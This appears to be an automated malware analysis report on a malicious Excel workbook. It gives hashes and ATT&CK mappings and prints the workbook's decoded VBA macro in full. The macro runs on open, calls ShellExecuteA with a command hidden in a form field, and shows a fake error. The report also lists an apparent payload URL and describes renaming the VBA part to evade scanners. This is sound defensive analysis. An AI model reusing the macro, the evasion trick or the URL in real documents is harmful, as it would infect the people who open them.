Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 5d1a0f2b5908c158…

MALICIOUS

Office (OOXML)

340.6 KB Created: 2020-06-03 09:29:42 UTC Authoring application: Microsoft Excel 15.0300 First seen: 2020-09-07
MD5: bcdadfdc16bcf022384c4631849e1396 SHA-1: d8037e4d08b75991123dd881e8d7d90ac236ef5f SHA-256: 5d1a0f2b5908c1583c889abea48061acb019f21d50f928fb5dd876434255d8d6
70 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

This Excel document contains a Workbook_Open VBA macro that is designed to execute a command. The macro utilizes the ShellExecuteA function, which is often used to download and execute a second-stage payload. The embedded URL was likely intended to host this payload.

Heuristics 4

  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: xl/dvdsvhufhuierhiu.txt)
  • VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMED
    The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    #End If
    Sub wORKBooK_oPen(): Call mPvdt: End Sub
    Sub mPvdt()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://ntro.fr/gtrdek/officeclick.png In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2726 bytes
SHA-256: a7b4475fbe67a5aef18d3c4c2ca4d0049285cb2fe9f3d892247bd028255dce11
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub bdbrx()

End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
#If VBA7 Then
#If Win64 Then
Private Declare PtrSafe Function Gsbsz Lib "shell32" Alias "ShellExecuteA" (ByVal ynnoy As LongPtr, ByVal tWrsp As String, ByVal HOFhq As String, ByVal ubqIj As String, ByVal NKezf As String, ByVal tWrsp As LongPtr) As LongPtr
#Else
Private Declare PtrSafe Function Gsbsz Lib "shell32" Alias "ShellExecuteA" (ByVal ynnoy As Long, ByVal tWrsp As String, ByVal HOFhq As String, ByVal ubqIj As String, ByVal NKezf As String, ByVal tWrsp As Long) As Long
#End If
#Else
#If Win64 Then
Private Declare PtrSafe Function Gsbsz Lib "shell32" Alias "ShellExecuteA" (ByVal ynnoy As LongPtr, ByVal tWrsp As String, ByVal HOFhq As String, ByVal ubqIj As String, ByVal NKezf As String, ByVal tWrsp As LongPtr) As LongPtr
#Else
Private Declare Function Gsbsz Lib "shell32" Alias "ShellExecuteA" (ByVal ynnoy As Long, ByVal tWrsp As String, ByVal HOFhq As String, ByVal ubqIj As String, ByVal NKezf As String, ByVal tWrsp As Long) As Long
#End If
#End If
Sub wORKBooK_oPen(): Call mPvdt: End Sub
Sub mPvdt()
Call yVhgV
End Sub
Sub yVhgV()
Call wGLTT
End Sub
Static Sub wGLTT()
Call IMxWv
End Sub
Sub IMxWv()
Call USjZX
End Sub
Sub USjZX()
Call SDMLV
End Sub
Static Sub SDMLV()
Call eJzOx
End Sub
Sub eJzOx()
Call qPlRZ
End Sub
Sub qPlRZ()
Call CVXUA
End Sub
Static Sub CVXUA()
Call AGBHy
End Sub
Function AGBHy() As Variant
Call Gsbsz(0, "oPEn", Split(UserForm1.CheckBox1.GroupName, ChrW$(32))(0), Right(UserForm1.CheckBox1.GroupName, Len(UserForm1.CheckBox1.GroupName) - Len(Split(UserForm1.CheckBox1.GroupName, ChrW$(32))(0))), "", 1)
MsgBox ("The filename, directory name, or volume label syntax is incorrect.")
Application.Quit
End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{8C3E8C44-A29C-418F-9ECA-FA230E799425}{013334C2-8723-4AC4-A94B-DFA180F51A91}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
vbaProject_00.bin vba-project OOXML VBA project: xl/dvdsvhufhuierhiu.txt 25088 bytes
SHA-256: efb1e49a1ba9b09f97684e3e49dee70cce454c1cfbe08e38b10adb2e15641266